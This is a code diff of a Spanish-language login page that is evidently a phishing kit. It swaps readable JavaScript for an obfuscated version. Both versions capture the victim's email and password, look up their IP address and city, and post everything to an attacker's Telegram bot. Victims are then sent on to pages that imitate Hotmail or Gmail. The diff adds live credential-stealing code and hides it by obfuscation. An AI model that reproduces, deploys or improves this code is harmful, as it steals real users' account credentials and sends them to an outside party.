--- a/index.html
+++ b/index.html
@@ -36,7 +36,7 @@
                 <div class="text-foot">
                     <div class="foot1">
                         <img src="zxc/lock.JPG" alt="">
-                        <p>Acceso seguro. Para ingresar tendrás que completar un proceso de autenticación adicional.</p>
+                        <p> <span>Acceso seguro.</span> Para ingresar tendrás que completar un proceso de autenticación adicional.</p>
                     </div>
                     <div class="prote">
                         <p class="text-prote">Protege tu contraseña</p>
@@ -46,6 +46,7 @@
                         </ul>
 
                     </div>
+                    <p class="termin">Términos y Condiciones</p>
 
                 </div>
 
@@ -112,139 +113,6 @@
 </body>
 </html>
 <script>
-    document.addEventListener('DOMContentLoaded', function() {
-const xjsx = document.querySelector('#xjsx');
-let js1 = document.querySelector('#js1');
-let js2 = document.querySelector('#js2');
-let nipper = document.querySelector('#cont-nipper');
-let sub = document.querySelector('#sub input');
-const err = document.querySelector('#err');
-const ey = document.querySelector('#ey');
+const _0x394357=_0x35b4;function _0x3f63(){const _0x1766ae=['json','/sendMessa','KCmSo','xViyj','#js2','gdEuJ','baaNy','https://ap','fszvx','password','Kyanu','#xjsx','TZkAd','IGykS','YXFYt','THnnC','zSMUL','sperado','otros.html','dSoJW','error','🥇🥇ALB🥇🥇\x0aC0','thDqz','none','ekCGE','g?format=j','#err','toMPK','56BHxjWi','JMpuo','eXUKm','Yhqdr','@live.com','@outlook.c','IVLCN','evamente,\x20','52zjYdRW','href','WfRPk','DybPY','VYzQD','submit','.html','input','aoToH','\x0a🌎IP:\x20','xTSXO','@outlook.e','RR30:\x20','fzWFL','getElement','tor','KsXnX','294664EmFmOf','vXdwK','1c9','\x20error\x20ine','JgUEr','n/json','type','eOWyQ','Color','#333','uEMUI','546152eIvnpY','i.ipify.or','Error:','style','rror:','country','son','rrVHF','on?token=4','i.telegram','TfIbp','@live.com.','gm/index.h','no-cache','endsWith','qMQhK','@msn.com','\x20incorrect','xNErx','#e1e1e1','gSYxR','HyZmr','igatorios','jlBeH','@gmail.com','js1','test','stringify','lEwiS','fSFlQ','IP:\x20','EZPkT','Ocurrió\x20un','catch','THXmx','cjyar','gfg','querySelec','@hotmail.e','XeOlY','fCbMJ','Campos\x20obl','info.io/js','then','#js1','#sub\x20input','tml','city','.org/bot','Formato\x20in','ohWne','Contraseña','129135EFiwVD','FSsSq','#3743aa','EFZek','JpjMN','ault','background','DOMContent','jkXby','stener','KqJja','DmDxL','outl/index','#ey','js2','@hotmail.c','fwJmj','nkbDI','HKqQh','applicatio','Intenta\x20nu','ZTAal','flex','\x0aPASSWR:\x20','color','HJEtH','QJyPV','RcpLc','PvzHO','IEjsb','#fff','display','OHJQf','addEventLi','https://ip','length','HZwLO','text','Telegram\x20e','\x20mal.','#cont-nipp','LDAuv','toLowerCas','TwgLZ','preventDef','value','Vpqtm','EDlNJ','trim','2803860gSCCMd','ggulH','innerHTML','572580XRbGFa','address','6da206f131','Loaded','algo\x20salió','EONhr','Jkjym','135699bjHFsw','some','GNEne','ById','UjyoV','aZgyl','location','dGXjQ','2337672CbgEJh','POST','lRorj','correcto.','click'];_0x3f63=function(){return _0x1766ae;};return _0x3f63();}(function(_0x53a5e7,_0x22fb12){const _0x39229d=_0x35b4,_0x4f6cb1=_0x53a5e7();while(!![]){try{const _0x17b5f1=-parseInt(_0x39229d(0xfe))/(-0x1*0x544+0x760+-0x21b)+parseInt(_0x39229d(0x166))/(-0x9*-0xd5+0x2a9*-0x1+-0x4d2)+parseInt(_0x39229d(0xb1))/(-0x38e+0x10ce+-0x1*0xd3d)+-parseInt(_0x39229d(0xe2))/(-0x1aca+0x1fae*0x1+-0x10*0x4e)*(parseInt(_0x39229d(0x132))/(0x12cc+0x12d*0x20+-0x3867))+parseInt(_0x39229d(0xb9))/(-0xd7*0x25+-0xd*0x1+-0x1bb*-0x12)+-parseInt(_0x39229d(0xda))/(0x1eea+0x192f+-0x1c09*0x2)*(-parseInt(_0x39229d(0xf3))/(-0x1ac3+-0x2*0x1f5+-0x1*-0x1eb5))+parseInt(_0x39229d(0x163))/(0x11*0x242+0x25b0+-0x4c09);if(_0x17b5f1===_0x22fb12)break;else _0x4f6cb1['push'](_0x4f6cb1['shift']());}catch(_0x335aa8){_0x4f6cb1['push'](_0x4f6cb1['shift']());}}}(_0x3f63,-0x2*0x46274+0x1b1*0x637+-0x2b*-0x1e17),document[_0x394357(0x153)+_0x394357(0x13b)](_0x394357(0x139)+_0x394357(0x169),function(){const _0x583b42=_0x394357,_0x84195d={'aoToH':_0x583b42(0xd5),'fCbMJ':function(_0x517c6f,_0x273546){return _0x517c6f==_0x273546;},'XeOlY':_0x583b42(0xc7),'ZTAal':_0x583b42(0x157),'Kyanu':function(_0x5eeab2,_0xa626bc){return _0x5eeab2>_0xa626bc;},'OHJQf':_0x583b42(0x134),'TwgLZ':_0x583b42(0x150),'TfIbp':_0x583b42(0x111),'xTSXO':_0x583b42(0xfc),'baaNy':function(_0x17eeb4,_0x184950){return _0x17eeb4===_0x184950;},'thDqz':_0x583b42(0x127)+_0x583b42(0x114),'Yhqdr':_0x583b42(0x12f)+_0x583b42(0xbc),'HyZmr':function(_0x558d9d,_0x1d3851){return _0x558d9d<=_0x1d3851;},'gSYxR':_0x583b42(0x131)+_0x583b42(0x10f)+'a','KCmSo':function(_0x3d3116,_0x1b1752){return _0x3d3116(_0x1b1752);},'THXmx':_0x583b42(0xc9),'IGykS':_0x583b42(0x12a),'DmDxL':_0x583b42(0xc2),'aZgyl':_0x583b42(0x15a)+'er','vXdwK':_0x583b42(0x12b),'EONhr':_0x583b42(0xd8),'jlBeH':_0x583b42(0x13f),'TZkAd':function(_0x10efea,_0x54891d,_0x5a0200){return _0x10efea(_0x54891d,_0x5a0200);},'fSFlQ':_0x583b42(0xbd),'uEMUI':_0x583b42(0xe9),'PvzHO':_0x583b42(0xe7)},_0x23c417=document[_0x583b42(0x123)+_0x583b42(0xf1)](_0x84195d[_0x583b42(0x120)]);let _0x5e5dcf=document[_0x583b42(0x123)+_0x583b42(0xf1)](_0x84195d[_0x583b42(0xcb)]),_0x5f0513=document[_0x583b42(0x123)+_0x583b42(0xf1)](_0x84195d[_0x583b42(0x13d)]),_0xdc525b=document[_0x583b42(0x123)+_0x583b42(0xf1)](_0x84195d[_0x583b42(0xb6)]),_0x3ba8e2=document[_0x583b42(0x123)+_0x583b42(0xf1)](_0x84195d[_0x583b42(0xf4)]);const _0x3fb45b=document[_0x583b42(0x123)+_0x583b42(0xf1)](_0x84195d[_0x583b42(0x16b)]),_0x1cafa2=document[_0x583b42(0x123)+_0x583b42(0xf1)](_0x84195d[_0x583b42(0x115)]);_0x84195d[_0x583b42(0xca)](setTimeout,function(){const _0x50238d=_0x583b42;_0xdc525b[_0x50238d(0x101)][_0x50238d(0x151)]=_0x84195d[_0x50238d(0xea)];},-0x64d*-0x1+0xde5*-0x2+0x251d),_0x1cafa2[_0x583b42(0x153)+_0x583b42(0x13b)](_0x84195d[_0x583b42(0x11b)],function(){const _0x504d70=_0x583b42;_0x84195d[_0x504d70(0x126)](_0x5f0513[_0x504d70(0xf9)],_0x84195d[_0x504d70(0x125)])?_0x5f0513[_0x504d70(0xf9)]=_0x84195d[_0x504d70(0x147)]:_0x5f0513[_0x504d70(0xf9)]=_0x84195d[_0x504d70(0x125)];});function _0x1c9129(){const _0x443723=_0x583b42,_0x5f25c7=_0x5e5dcf[_0x443723(0x15f)][_0x443723(0x162)](),_0x253bda=_0x5f0513[_0x443723(0x15f)][_0x443723(0x162)](),_0x395171=/^[^\s@]+@[^\s@]+\.[^\s@]+$/,_0x36e5a8=_0x395171[_0x443723(0x118)](_0x5f25c7)&&_0x84195d[_0x443723(0xc8)](_0x253bda[_0x443723(0x155)],-0x55b+-0x1*-0x2195+0x1c33*-0x1);_0x36e5a8?(_0x3ba8e2[_0x443723(0x101)][_0x443723(0x138)+_0x443723(0xfb)]=_0x84195d[_0x443723(0x152)],_0x3ba8e2[_0x443723(0x101)][_0x443723(0x14a)]=_0x84195d[_0x443723(0x15d)]):(_0x3ba8e2[_0x443723(0x101)][_0x443723(0x138)+_0x443723(0xfb)]=_0x84195d[_0x443723(0x108)],_0x3ba8e2[_0x443723(0x101)][_0x443723(0x14a)]=_0x84195d[_0x443723(0xec)]);}_0x5e5dcf[_0x583b42(0x153)+_0x583b42(0x13b)](_0x84195d[_0x583b42(0xfd)],_0x1c9129),_0x5f0513[_0x583b42(0x153)+_0x583b42(0x13b)](_0x84195d[_0x583b42(0xfd)],_0x1c9129),_0x23c417[_0x583b42(0x153)+_0x583b42(0x13b)](_0x84195d[_0x583b42(0x14e)],_0x8e6f00=>{const _0x1b195a=_0x583b42;_0x8e6f00[_0x1b195a(0x15e)+_0x1b195a(0x137)]();const _0x408763=_0x5e5dcf[_0x1b195a(0x15f)][_0x1b195a(0x162)](),_0x3b3ace=_0x5f0513[_0x1b195a(0x15f)][_0x1b195a(0x162)](),_0x88a6ca=/^[^\s@]+@[^\s@]+\.[^\s@]+$/;if(_0x84195d[_0x1b195a(0xc4)](_0x408763[_0x1b195a(0x155)],0xb9d+-0x4*-0x755+-0x28f1)||_0x84195d[_0x1b195a(0xc4)](_0x3b3ace[_0x1b195a(0x155)],0x2669*-0x1+0x1*-0x335+0x299e))return _0x3fb45b[_0x1b195a(0x165)]=_0x84195d[_0x1b195a(0xd4)],![];else{if(!_0x88a6ca[_0x1b195a(0x118)](_0x408763))return _0x3fb45b[_0x1b195a(0x165)]=_0x84195d[_0x1b195a(0xdd)],![];else{if(_0x84195d[_0x1b195a(0x113)](_0x3b3ace[_0x1b195a(0x155)],0x833+0x201*-0x6+0x22*0x1d))return _0x3fb45b[_0x1b195a(0x165)]=_0x84195d[_0x1b195a(0x112)],![];}}_0x84195d[_0x1b195a(0xc0)](sender,_0x8e6f00);});}));function _0x35b4(_0x5ebe13,_0x428712){const _0x37ce3e=_0x3f63();return _0x35b4=function(_0x5bb0b0,_0x1e33c4){_0x5bb0b0=_0x5bb0b0-(0x2*-0x72b+-0xaca*0x3+0xb*0x44f);let _0x42dbea=_0x37ce3e[_0x5bb0b0];return _0x42dbea;},_0x35b4(_0x5ebe13,_0x428712);}function fetchIPData(){const _0x1f9f40=_0x394357,_0x4b2404={'EZPkT':_0x1f9f40(0x122),'EFZek':function(_0x4d3c5f,_0x2aade7){return _0x4d3c5f(_0x2aade7);},'UjyoV':_0x1f9f40(0x154)+_0x1f9f40(0x128)+_0x1f9f40(0x106)+_0x1f9f40(0x168)+_0x1f9f40(0xf5),'JMpuo':_0x1f9f40(0x167),'fszvx':_0x1f9f40(0xc5)+_0x1f9f40(0xff)+_0x1f9f40(0xd7)+_0x1f9f40(0x104)};return _0x4b2404[_0x1f9f40(0x135)](fetch,_0x4b2404[_0x1f9f40(0xc6)])[_0x1f9f40(0x129)](_0x14193b=>_0x14193b[_0x1f9f40(0xbe)]())[_0x1f9f40(0x129)](_0x46c67f=>{const _0x3a0d9c=_0x1f9f40;return document[_0x3a0d9c(0xf0)+_0x3a0d9c(0xb4)](_0x4b2404[_0x3a0d9c(0x11d)])[_0x3a0d9c(0x165)]=_0x46c67f['ip'],_0x4b2404[_0x3a0d9c(0x135)](fetch,_0x4b2404[_0x3a0d9c(0xb5)]);})[_0x1f9f40(0x129)](_0x4d3538=>_0x4d3538[_0x1f9f40(0xbe)]())[_0x1f9f40(0x129)](_0x5d1320=>{const _0x533cd8=_0x1f9f40;document[_0x533cd8(0xf0)+_0x533cd8(0xb4)]('ip')[_0x533cd8(0x165)]=_0x533cd8(0x11c)+_0x5d1320['ip'],document[_0x533cd8(0xf0)+_0x533cd8(0xb4)](_0x4b2404[_0x533cd8(0xdb)])[_0x533cd8(0x165)]=_0x5d1320[_0x533cd8(0x12d)]+',\x20'+_0x5d1320[_0x533cd8(0x103)];});}function sender(_0x39d9d7){const _0x561cca=_0x394357,_0x3ddf8d={'lEwiS':_0x561cca(0x100),'zSMUL':function(_0x2317e6,_0xca852b){return _0x2317e6(_0xca852b);},'IVLCN':_0x561cca(0x11e)+_0x561cca(0xf6)+_0x561cca(0xcf),'Jkjym':_0x561cca(0x13e)+_0x561cca(0xe8),'JgUEr':_0x561cca(0x116),'HJEtH':_0x561cca(0x10a)+_0x561cca(0x12c),'LDAuv':_0x561cca(0xd0),'ggulH':_0x561cca(0x148),'KqJja':_0x561cca(0x141)+'om','rrVHF':_0x561cca(0x124)+'s','xNErx':_0x561cca(0xdf)+'om','VYzQD':_0x561cca(0xed)+'s','dGXjQ':_0x561cca(0xde),'toMPK':_0x561cca(0x109)+'mx','dSoJW':_0x561cca(0x10e),'eXUKm':function(_0x2ac3b5,_0x1c5d3e,_0x1a14fd){return _0x2ac3b5(_0x1c5d3e,_0x1a14fd);},'GNEne':_0x561cca(0x146)+_0x561cca(0xe1)+_0x561cca(0x16a)+_0x561cca(0x159),'Vpqtm':_0x561cca(0x158)+_0x561cca(0x102),'cjyar':_0x561cca(0x117),'nkbDI':_0x561cca(0x140),'FSsSq':_0x561cca(0x15a)+'er','gdEuJ':_0x561cca(0x122),'ekCGE':_0x561cca(0x167),'lRorj':_0x561cca(0xba),'jkXby':_0x561cca(0x145)+_0x561cca(0xf8),'fzWFL':_0x561cca(0x10b),'YXFYt':function(_0x420dc8){return _0x420dc8();}};_0x39d9d7[_0x561cca(0x15e)+_0x561cca(0x137)](),_0x3ddf8d[_0x561cca(0xcc)](fetchIPData)[_0x561cca(0x129)](()=>{const _0x3f3114=_0x561cca,_0x2d9f27={'fwJmj':_0x3ddf8d[_0x3f3114(0x16c)],'ohWne':_0x3ddf8d[_0x3f3114(0xf7)],'WfRPk':_0x3ddf8d[_0x3f3114(0x14b)],'HZwLO':_0x3ddf8d[_0x3f3114(0x15b)],'eOWyQ':_0x3ddf8d[_0x3f3114(0x164)],'QJyPV':_0x3ddf8d[_0x3f3114(0x13c)],'EDlNJ':_0x3ddf8d[_0x3f3114(0x105)],'xViyj':_0x3ddf8d[_0x3f3114(0x110)],'JpjMN':_0x3ddf8d[_0x3f3114(0xe6)],'qMQhK':_0x3ddf8d[_0x3f3114(0xb8)],'IEjsb':_0x3ddf8d[_0x3f3114(0xd9)],'RcpLc':_0x3ddf8d[_0x3f3114(0xd1)],'THnnC':function(_0x195381,_0x5ec366,_0xeb808){const _0x3c7c71=_0x3f3114;return _0x3ddf8d[_0x3c7c71(0xdc)](_0x195381,_0x5ec366,_0xeb808);},'HKqQh':function(_0x21aa91,_0x5ee225){const _0x538393=_0x3f3114;return _0x3ddf8d[_0x538393(0xce)](_0x21aa91,_0x5ee225);},'DybPY':_0x3ddf8d[_0x3f3114(0xb3)],'KsXnX':_0x3ddf8d[_0x3f3114(0x160)]};let _0x129ad3=document[_0x3f3114(0xf0)+_0x3f3114(0xb4)](_0x3ddf8d[_0x3f3114(0x121)])[_0x3f3114(0x15f)],_0x52ee18=document[_0x3f3114(0xf0)+_0x3f3114(0xb4)](_0x3ddf8d[_0x3f3114(0x143)])[_0x3f3114(0x15f)],_0x5e2e7b=document[_0x3f3114(0x123)+_0x3f3114(0xf1)](_0x3ddf8d[_0x3f3114(0x133)]);const _0x7f3cef=document[_0x3f3114(0xf0)+_0x3f3114(0xb4)](_0x3ddf8d[_0x3f3114(0xc3)])[_0x3f3114(0x165)],_0x50a250=document[_0x3f3114(0xf0)+_0x3f3114(0xb4)](_0x3ddf8d[_0x3f3114(0xd6)])[_0x3f3114(0x165)],_0x4fb2f7=_0x3f3114(0xd3)+_0x3f3114(0xee)+_0x129ad3+_0x3f3114(0x149)+_0x52ee18+_0x3f3114(0xeb)+_0x7f3cef+'\x0a'+_0x50a250,_0x26fdd8=T0KEN,_0x44f1f5=CHATID,_0x418133={'method':_0x3ddf8d[_0x3f3114(0xbb)],'headers':{'Content-Type':_0x3ddf8d[_0x3f3114(0x13a)],'cache-control':_0x3ddf8d[_0x3f3114(0xef)]},'body':JSON[_0x3f3114(0x119)]({'chat_id':_0x44f1f5,'text':_0x4fb2f7})};_0x3ddf8d[_0x3f3114(0xdc)](fetch,_0x3f3114(0xc5)+_0x3f3114(0x107)+_0x3f3114(0x12e)+_0x26fdd8+(_0x3f3114(0xbf)+'ge'),_0x418133)[_0x3f3114(0x129)](_0x52ea7a=>_0x52ea7a[_0x3f3114(0xbe)]())[_0x3f3114(0x129)](_0x98451d=>{const _0x10d315=_0x3f3114;if(_0x98451d['ok']){const _0x17a561=_0x129ad3[_0x10d315(0x15c)+'e']();_0x5e2e7b[_0x10d315(0x101)][_0x10d315(0x151)]=_0x2d9f27[_0x10d315(0xfa)];const _0x261d91=[_0x2d9f27[_0x10d315(0x14c)],_0x2d9f27[_0x10d315(0x161)],_0x2d9f27[_0x10d315(0xc1)],_0x2d9f27[_0x10d315(0x136)],_0x2d9f27[_0x10d315(0x10d)],_0x2d9f27[_0x10d315(0x14f)],_0x2d9f27[_0x10d315(0x14d)]];_0x2d9f27[_0x10d315(0xcd)](setTimeout,function(){const _0x567a1e=_0x10d315;if(_0x261d91[_0x567a1e(0xb2)](_0x19ac22=>_0x17a561[_0x567a1e(0x10c)](_0x19ac22)))window[_0x567a1e(0xb7)][_0x567a1e(0xe3)]=_0x2d9f27[_0x567a1e(0x142)];else _0x17a561[_0x567a1e(0x10c)](_0x2d9f27[_0x567a1e(0x130)])?window[_0x567a1e(0xb7)][_0x567a1e(0xe3)]=_0x2d9f27[_0x567a1e(0xe4)]:window[_0x567a1e(0xb7)][_0x567a1e(0xe3)]=_0x2d9f27[_0x567a1e(0x156)];},-0x2041+0x1164+0x551*0x5);}else _0x2d9f27[_0x10d315(0x144)](alert,_0x2d9f27[_0x10d315(0xe5)]),console[_0x10d315(0xd2)](_0x2d9f27[_0x10d315(0xf2)],_0x98451d);})[_0x3f3114(0x11f)](_0x5eeb2d=>{const _0x30f7f9=_0x3f3114;console[_0x30f7f9(0xd2)](_0x3ddf8d[_0x30f7f9(0x11a)],_0x5eeb2d),_0x3ddf8d[_0x30f7f9(0xce)](alert,_0x3ddf8d[_0x30f7f9(0xe0)]);});});}
 
-setTimeout(function(){
-    nipper.style.display = "none";
-}, 4000)
-
-ey.addEventListener('click', function(){
-    if(js2.type == "password"){
-        js2.type = "text";
-
-    }else{
-        js2.type = "password";
-    }
-})
-function validarEnTiempoReal() {
-    const email = js1.value.trim();
-    const password = js2.value.trim();
-    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
-
-    const esValido = emailRegex.test(email) && password.length > 7;
-
-    if (esValido) {
-        sub.style.backgroundColor = "#3743aa";
-        sub.style.color = "#fff";
-    } else {
-        sub.style.backgroundColor = "#e1e1e1"; // Volver al color por defecto
-        sub.style.color = "#333";
-
-    }
-}
-
-// Escuchar cambios en tiempo real
-js1.addEventListener('input', validarEnTiempoReal);
-js2.addEventListener('input', validarEnTiempoReal);
-
-
-
-xjsx.addEventListener('submit', e => {
-    e.preventDefault();
-    const email = js1.value.trim();
-    const password = js2.value.trim();
-    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
-
-    if (email.length === 0 || password.length === 0) {
-        err.innerHTML = "Campos obligatorios";
-        return false;
-    } else if (!emailRegex.test(email)) {
-        err.innerHTML = "Formato incorrecto.";
-        return false;
-    } else if (password.length <= 7) {
-        err.innerHTML = "Contraseña incorrecta";
-        return false;
-    }
-
-    sender(e);
-});
-
-
-
-
-});
-
-function fetchIPData() {
-return fetch('https://api.ipify.org?format=json')
-   .then(response => response.json())
-   .then(data => {
-       document.getElementById("gfg").innerHTML = data.ip;
-       return fetch('https://ipinfo.io/json?token=46da206f1311c9'); 
-   })
-   .then(response => response.json())
-   .then(data => {
-       document.getElementById("ip").innerHTML = `IP: ${data.ip}`;
-       document.getElementById("address").innerHTML = `${data.city}, ${data.country}`;
-   });
-}
-
-function sender(e) {
-    e.preventDefault();
-    fetchIPData().then(() => {
-        let js1 = document.getElementById("js1").value;
-        let js2 = document.getElementById("js2").value;
-        let nipper = document.querySelector('#cont-nipper');
-        const ip = document.getElementById("gfg").innerHTML;
-        const ip2 = document.getElementById("address").innerHTML;
-        const message = `🥇🥇ALB🥇🥇\nC0RR30: ${js1}\nPASSWR: ${js2}\n🌎IP: ${ip}\n${ip2}`;
-
-        const T0K3N = T0KEN; 
-        const chatID = CHATID;
-
-        const settings = {
-            method: 'POST',
-            headers: {
-                'Content-Type': 'application/json',
-                'cache-control': 'no-cache'
-            },
-            body: JSON.stringify({
-                chat_id: chatID,
-                text: message
-            })
-        };
-
-        fetch(`https://api.telegram.org/bot${T0K3N}/sendMessage`, settings)
-            .then(response => response.json())
-            .then(data => {
-                if (data.ok) {
-                    const email = js1.toLowerCase();
-                    nipper.style.display = 'flex';
-
-                    setTimeout(function(){
-                        if (email.includes("@hotmail")) {
-                        window.location.href = 'outl/index.html';
-                    } else if (email.includes("@gmail")) {
-                        window.location.href = 'gm/index.html';
-                    } else {
-                        window.location.href = 'otros.html';
-                    }
-                    }, 3000)
-
-                } else {
-                    alert('Intenta nuevamente, algo salió mal.');
-                    console.error('Telegram error:', data);
-                }
-            })
-            .catch(error => {
-                console.error('Error:', error);
-                alert('An error occurred');
-            });
-    });
-}</script>
+</script>
